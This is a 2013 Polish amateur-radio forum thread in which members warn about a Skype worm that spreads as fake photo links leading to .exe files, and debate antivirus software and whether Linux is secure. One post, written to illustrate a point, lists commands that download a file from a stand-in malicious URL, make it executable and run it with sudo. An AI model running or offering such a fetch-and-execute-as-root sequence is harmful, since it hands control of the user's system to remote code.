| | |
| sp5mnj | 14.03.2013 21:55:04 |
Grupa: Użytkownik
Posty: 3964 #1245231
Od: 2009-12-19
Ilość edycji wpisu: 1 | Dostaję coraz więcej informacji na Skype z linkiem.
Wiem z wcześniejszych informacji, że zaatakowany przez wirusa, pleni się potężnie.
Nie otwierajcie linków do zdjęć, zazwyczaj .jpg, ale są też photo, img
infekcja jest niebezpieczna i kończy się załamaniem systemu
ja jeszcze żyję...ale nie wiem jak długo
jeżeli ktoś otrzymał linki do obrazka z moim znakiem sp5mnj - zapewniam to nie ja
edit:
Andrzej |
| | |
| Electra | 25.04.2024 22:31:13 |
 |
|
| | |
| SP1AP | 14.03.2013 22:10:45 |
Grupa: Użytkownik
QTH: Restricted Area
Posty: 5517 #1245249
Od: 2011-5-3
UŻYTKOWNIK ZABLOKOWANY | Zgadza się, ja też kilkakrotnie dostałem taką "paskudę", niby od kogoś z mej listy kontaktów z linkiem i "niewinnie" brzmiącym pytaniem;"Czy to naprawdę są Twoje zdjęcia?", a w linku wystepuje mój znak!
Absolutnie tego nie otwieram, bo już od przylaciół w DL i EA dostałem wcześniej ostrzeżenie!  |
| | |
| sp3aok | 14.03.2013 22:22:02 |
Grupa: Użytkownik
QTH: LUBIN
Posty: 1051 #1245263
Od: 2009-10-19
| Jak się ma słabego antywirusa to draństwo zagnieździ się w komputerze, i rozsyła do innych znajomych ze SKYPE.
COMODO INTERNET SECURITY radzi sobie z tą paskudą dobrze.
Rysiek sp3aok Lubin
_________________
SP9-1166 |
| | |
| sp2irv | 14.03.2013 22:23:46 |
Grupa: Użytkownik
Posty: 56 #1245266
Od: 2011-2-26
| ... tez cos takie do mnie dotarlo ale OS tego nie przyjmuje.
Od wielu lat mialem LINUX- a i nie wiem co to jest WIRUS.
_________________
_________________
73 - Rysiek |
| | |
| jarrl | 14.03.2013 22:25:46 |
Grupa: Użytkownik
Posty: 73 #1245270
Od: 2011-3-20
| Potwierdzam!
Ja i moich dwóch kolegów też dostało taki "prezent" Na razie efektów nie widać, ale nigdy nie wiadomo co będzie dalej.Uważajcie i nie otwierajcie, komuś się nudzi.
Jurek
|
| | |
| sq2klu | 14.03.2013 22:27:22 |
Grupa: Użytkownik
QTH: Bydgoszcz
Posty: 99 #1245271
Od: 2012-11-2
| Witam!
To, że te linki przyszły od "Krzysztofa" oznacza, że jego komputer został już zainfekowany i rozsyła to do wszystkich znajomych ze swojej listy skype.
Też dostałem takie wiadomości od kilku osób. Plik, który się pobiera po naciśnięciu na podane liki ma rozszerzenie "exe" i jest to w/w wirus.
Po uruchomieniu pobranego pliku infekuje on komputer i używa skype do rozsyłania się dalej pod pozorem wysyłki zdjęć.
_________________
Daniel,
SQ2KLU |
| | |
| SQ6KOJ | 14.03.2013 22:29:54 |
Grupa: Użytkownik
QTH: JO81MC - Wrocław
Posty: 281 #1245276
Od: 2011-2-25
| To Ci ciekawostka. Wydaje mi się, że jak ktoś ma Windowsa 7 lub 8 to chyba nie pójdzie tak łatwo. Sama kwestia uprawnień programów została zmodyfikowana od czasów XP i starszych. A kolega który używa systemów uniksowych niech nie żyje w przekonaniu że na uniksy nie ma wirusów  |
| | |
| sp3imm | 14.03.2013 22:41:39 |
Grupa: Użytkownik
QTH: Konin
Posty: 124 #1245285
Od: 2009-6-23
| mam Windowsa 7 i kilka dni temu też złapałem
potrzebny jest program antywirusowy
od 2 dni już mi pilnuje i nie złapałem na razie nic
Pożyjemy - zobaczymy
_________________
„Inteligentny wszystko zauważa. Głupi wszystko komentuje.”
— Heinrich Heine
SP3IMM Stanisław |
| | |
| SQ6KOJ | 14.03.2013 22:43:19 |
Grupa: Użytkownik
QTH: JO81MC - Wrocław
Posty: 281 #1245287
Od: 2011-2-25
| No tak ale tu dochodzi jeszcze jedna ważna kwestia... Kto otwiera zdjęcia które mają rozszerzenie exe  |
| | |
| SQ6KOJ | 14.03.2013 22:50:39 |
Grupa: Użytkownik
QTH: JO81MC - Wrocław
Posty: 281 #1245298
Od: 2011-2-25
| Tak Stanisławie, takie są właśnie przyczyny wierzenia w stereotypy o Linuksach Owszem wirusy są mniej popularne bo i sama ilość użytkowników mówi za siebie. Bardziej się opłaca wykorzystać dziurę lub nieuwagę użytkownika pod Windowsem bo jest to system póki co nr. 1 pod względem ilości użytkowników |
| | |
| sp5mnj | 14.03.2013 23:17:05 |
Grupa: Użytkownik
Posty: 3964 #1245321
Od: 2009-12-19
| Tak mi się wydaje...a było nie przechodzić na wersje 6...ja, mam niższą
Andrzej |
| | |
| Electra | 25.04.2024 22:31:13 |
|
|
| | |
| sq8jmd | 14.03.2013 23:42:08 |
Grupa: Użytkownik
Posty: 479 #1245351
Od: 2010-11-29
Ilość edycji wpisu: 1 | SQ6KOJ pisze: Tak Stanisławie, takie są właśnie przyczyny wierzenia w stereotypy o Linuksach Owszem wirusy są mniej popularne bo i sama ilość użytkowników mówi za siebie. Bardziej się opłaca wykorzystać dziurę lub nieuwagę użytkownika pod Windowsem bo jest to system póki co nr. 1 pod względem ilości użytkowników
1) Polecam zapoznać się z konkursem pwn2own - to nie jest konkurs dla "pryszczersów"
2) Wirusy na Linuksa są jak Yeti, każdy słyszał, nikt nie widział.
3) Domyślnie każdy ściągnięty plik nie ma parametru wykonywalności więc nie można go uruchomić.
4) AppArmor (standardowo stosowane np w Ubuntu), SELinux - powodzenia w obejściu SELinux, jest to wyższa szkoła jazdy.
Są znane przypadki kiedy to część komputerów Linuksowych została zarażona, takie przypadki to chociażby wygaszacz ekranu z gnome-looks.org. Informacja o takim niebezpieczeństwie rozchodzi się "szybciej niż w służbach bezpieczeństwa".
Repozytoria są dobrze chronione (co nie oznacza możliwości zainfekowania softu w repozytoriach). Nim coś trafi do oficjalnego repo przechodzi wiele ścieżek przez wiele użytkowników. Domyślnie użytkownik nie pracuje na prawach roota (w przeciwieństwie do Windowsa). Szybkość łatania dziur w Linuksie jest o wiele szybsza niż pod M$. M$ poza standardowym planem aktualizacyjnym raz na ruski rok przy bardzo krytycznej luce wystawi łatki w usłudze "Windows update".
Wnioskując, aby wirus się dostał na Linuksa musimy wykonać następujące polecenia:
wget http://zlastrona.pl/wirus
chmod +x wirus
sudo ./wirus
Linuksa używam od około 2000 roku, nie tylko hobbistycznie ale i zawodowo. Moja dziewczyna również używa Linuksa (jest nie techniczna). Rodzice tak samo. Żadnych kłopotów mimo tego, że user robi co chce i jak chce.
Na pewno tą wypowiedzią zrobię burzę w szklance wody ale proszę rozróżnić następujące pojęcia, wirus i trojan. Ten pierwszy ma za zadanie rozpowszechniać się sam. Więc retorycznie pytając, czy wirusy (patrząc na zabezpieczenia systemów Linuksowych) istnieją?
Oczywiście są metody aby użytkownika skusić do uruchomienia czegoś (przynajmniej bez roota aby program, chcący się zwać wirusem, zaczął działać w systemie) ale różnice pomiędzy dystrybucjami powodują większy kłopot w znalezieniu dziury w systemie (chociażby poprzez bufferoverflow).
Kończąc swoją wypowiedź, wirusy na Linuksa jak najbardziej mogłyby być popularne (patrz zestawienie top500) ale zróżnicowanie i wbudowane mechanizmy obronne robią swoje (SELinux jest tworzone przez NSA. Jeżeli trzeba to nawet po VNC mogę wystawić np. Ubuntu 12.10 i dać konto (bez roota), powodzenia w zainfekowaniu systemu - nie kolega pierwszy i nie ostatni będzie tak pisał zamiast przedstawić dowód (do dowodów nie zaliczam włamanie się do repo i zainfekowanie tylko kilku tysięcy maszyn).
Coś o SELinux - http://www.nsa.gov/research/selinux/
Coś o AppArmor (standardowe np. dla Ubuntu czy Fedory) http://en.wikipedia.org/wiki/AppArmor
Ps. Czekam na dowody, gdybanie proszę zostawić na spotkanie przy piwku czy kawce bo chętnie porozmawiam na ten temat, wszak nie jestem nieomylny lecz dążę do poszerzenia jeszcze bardziej mojej wiedzy.
_________________
|
| | |
| sq8jmd | 15.03.2013 00:01:57 |
Grupa: Użytkownik
Posty: 479 #1245379
Od: 2010-11-29
|
To już stara dziura którą Microsoft/Skype załatał. Na szczęście mieli bardzo szybki czas reakcji od wypłynięcia dziury na światło dzienne.
_________________
|
| | |
| SP5XMI | 15.03.2013 00:12:55 |
Grupa: Użytkownik
QTH: Warszawa
Posty: 3443 #1245386
Od: 2012-12-16
Ilość edycji wpisu: 1 | Jest jeszcze dziura w Javie. Póki co nie ma na nią łaty. Da się w ten sposób zainfekować w pełni zaktualizowane Windows 7 i 8, praktycznie niezależnie od przeglądarki, ale z Internet Explorerem najłatwiej (jak zwykle). Do tego celu też można użyć skype'a, link będzie wyglądał jako JPG i strona również, ale w ukrytej ramce IFRAME będzie link do apleciku Javy lub obiektu Flash. Chwila moment i masz Windowsy zarażone. W ten sam sposób da się zarazić i ogryzka (do roota włącznie) a na Ubuntu wykonać dowolny z zainstalowanych programów, tyle, że bez podwyższonych uprawnień (czyli w sumie niewiele można zrobić).
Oto cytat z tekstu o 12 mitach w IT: Raimund Genes, CTO firmy Trend Micro, wyjaśnia: "Firmy korzystają z antywirusów, dlatego że muszą. W przeciwnym razie wyniki audytów byłyby dla nich niszczące. Oprogramowanie antywirusowe nie może skutecznie ochronić przed kierowanym, specjalizowanym atakiem, gdyż napastnicy tak przygotują kod, by antywirus go nie wyłapał".
Do przygotowania takiego ataku wystarczy instalacja oprogramowania różnych firm w testowych środowiskach, ale o wiele szybciej można zrealizować to zadanie za pomocą strony VirusTotal. Omijanie złośliwego oprogramowania przy dzisiejszych narzędziach nie wykracza poza możliwości przeciętnego programisty.
Koniec cytatu. Raimunda znam osobiście od pięciu lat i ten facet naprawdę wie co mówi.
edit - Zarówno Java, jak i Flash mają bogatą historię, sporo komputerów ma ten soft nieaktualny i skutki są takie, jak widać. Skype też ma za uszami dystrybucję śmieci. O problemach z bezpieczeństwem tej aplikacji głośno było od dawna, oto przykładowy tekst na ten temat z 2008r. Między innymi dlatego co mądrzejsze firmy blokują ruch Skype w swoich sieciach a odpalenie tego komunikatora w wielu korporacjach wywołuje alarm - wystarczy poczytać dlaczego.
_________________
Sent from Marconi Oceanspan with 3x807 in the finals.
Pozdrawiam, SP5XMI Marcin |
| | |
| SQ6OWF | 15.03.2013 00:23:05 |
Grupa: Użytkownik
QTH: JO81lc
Posty: 586 #1245394
Od: 2011-7-2
| Trzeba podziękować wujkowi Billowi za domyślne ukrywanie rozszerzeń znanych plików.... I kilka innych "ułatwień" dla ciemnego luda oraz szkodników. Infekcja szkodliwa, ale rozprzestrzenia się niczym "wirus Albański"
_________________
Michał
SQ6OWF
|
| | |
| sq8jmd | 15.03.2013 00:40:47 |
Grupa: Użytkownik
Posty: 479 #1245409
Od: 2010-11-29
| SP95094KA pisze:
Dostałem dzisiaj wiadomość że mam zmienić Javę na najnowszą, co oczywiście uczyniłem.
A swoja drogą
Kto dokonywał uninstal Javy. I usuwał wszystkie "korzonki" po tej Javie ?
Pozdro
Domyślnie Java sprawdza czy ma aktualizacje i potrafi się sama aktualizować, czyżby kolega używał wtedy jakiejś antycznej Javy która takowej opcji nie posiada?
Przepraszam, że się tak przyczepiłem ale z mojego doświadczenia zarażone komputery z którymi miałem do czynienia osobiście lub nie (np czyściłem zarażoną stronę gdyż login/hasło do ftp zostały wykradzione) miały bardzo często nieaktualne oprogramowanie.
_________________
|
| | |
| SP7UWL | 15.03.2013 02:14:21 |
Grupa: Administrator 
QTH: Tomek-Kielce | gg1370101
Posty: 1083 #1245444
Od: 2007-5-11
| sp8jz pisze:
Ja tam nic nie popieram wiem tylko, że kurestwo zdolne przejąć login i hasło zablokowało mi właśnie sp8jz.strefa.pl
(...)
Ostrzeżenie za bluzganie na forum, również we wcześniejszych postach. To nie onet.
_________________
The UNIX Guru`s view of Sex:
unzip; strip; touch; finger; mount; fsck; more; yes; unmount; sleep |
| | |
| SP7UWL | 15.03.2013 02:15:35 |
Grupa: Administrator
QTH: Tomek-Kielce | gg1370101
Posty: 1083 #1245445
Od: 2007-5-11
| sp8jz pisze:
Ja tam nic nie popieram wiem tylko, że kurestwo zdolne przejąć login i hasło zablokowało mi właśnie sp8jz.strefa.pl
(...)
Ostrzeżenie za bluzganie na forum, również we wcześniejszych postach. To nie onet.
_________________
The UNIX Guru`s view of Sex:
unzip; strip; touch; finger; mount; fsck; more; yes; unmount; sleep |
| | |
| sp4jfr | 15.03.2013 07:48:14 |
Grupa: Użytkownik
QTH: KO04RA, Nakomiady, Mazury
Posty: 1743 #1245543
Od: 2011-8-12
| Nie zauważyłem u siebie tego zjawiska. Do pracy w sieci używam wyłącznie Linuxa.
_________________
VY 72&73
Bolek
K2 QRP + PA, anteny: druty + HexBeam |
| | |
| sq6ade | 15.03.2013 08:17:52 |
Grupa: Użytkownik
QTH: Wrocław (Breslau) Party-n
Posty: 15114 #1245579
Od: 2008-3-21
| A skajpaj nie ostrzega przed otwieraniem linków tak jak GG ?
_________________
Wiosna się budzi w całej naturze
Witana rzewnym słowików pieniem,
W zielonym gaju, ponad strumieniem,
Kwitną prześliczne dwie róże.
 |
| | |
| Electra | 25.04.2024 22:31:13 |
|
|
FILMY VIDEO 
